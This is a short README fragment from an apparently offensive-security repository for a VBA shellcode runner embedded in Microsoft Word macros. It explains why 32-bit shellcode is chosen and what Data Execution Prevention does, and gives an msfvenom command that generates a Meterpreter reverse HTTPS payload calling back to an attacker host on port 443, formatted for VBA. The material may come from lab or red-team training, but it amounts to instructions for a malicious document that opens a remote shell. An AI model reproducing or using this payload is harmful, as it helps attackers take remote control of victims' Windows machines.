TatTvamAsi-786/VBA-Shellcode-Runner/README.md

 Allocating memory through other Win32 APIs returns non-executable memory due to the memory protection called Data Execution Prevention (DEP)

 In order to generate the shellcode, we need to know the target architecture.
 Obviously we are targeting a 64-bit Windows machine, but Microsoft Word 2016 installs as 32-bit by default, so we will generate 32-bit shellcode.

+Also set sslversion TLS1.2 to handle https payload

     msfvenom -p windows/meterpreter/reverse_https LHOST=tun0 LPORT=443 EXITFUNC=thread -f vbapplication